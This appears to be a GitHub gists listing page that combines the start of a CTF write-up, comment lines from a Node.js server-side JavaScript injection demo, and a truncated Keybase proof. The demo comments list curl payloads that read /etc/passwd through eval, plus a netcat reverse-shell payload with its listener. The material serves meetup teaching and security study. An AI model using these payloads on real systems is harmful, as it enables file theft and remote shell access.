Renato Rodrigues Simpsonpt
Simpsonpt /
Last active Mar 20, 2019
H1-702-CTF Write-up.

During the C-Days18 conference André (@0xACB) and Zé (@JLLiS) CTF junkies teased me to participate in H1CTF18. At first, I wasn't entirely convinced since it had already been running for a few days. Nevertheless, I decided to have a crack at it.

The web challenge starts with a simple visit to an endpoint that is running a webpage with the title "Notes RPC Capture The Flag" and, in the body, " ...somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden."

Without a shadow of a doubt, I must find a way to interact with that note service.

1 - Recon Phase

As always, recon is the first thing to do. I started with the browser: after opening the page, I turned to the Network tab in the Developer Tools and went through the response headers, where I found "Apache/2.4.18 (Ubuntu)".

My first attempt was looking for "/server-status/" since the ([status

Simpsonpt / nodejs-ssjs-nodebleed.js
Created Mar 11, 2016
Demo from 0xOPOSEC Meetup - Node.js Problems in Paradise -
* NodeBleed Original Bug:
* PoC: $ node nodejs-ssjs-nodebleed.js
* "Attack":
* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C
* Insecure evals Payloads:
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)

Keybase proof

I hereby claim:

  • I am simpsonpt on github.
  • I am simpson ( on keybase.
  • I have a public key whose fingerprint is C709 0843 B313 B823 DD14 7046 52A3 759A 8429 29E4

To claim this, I am signing this object:
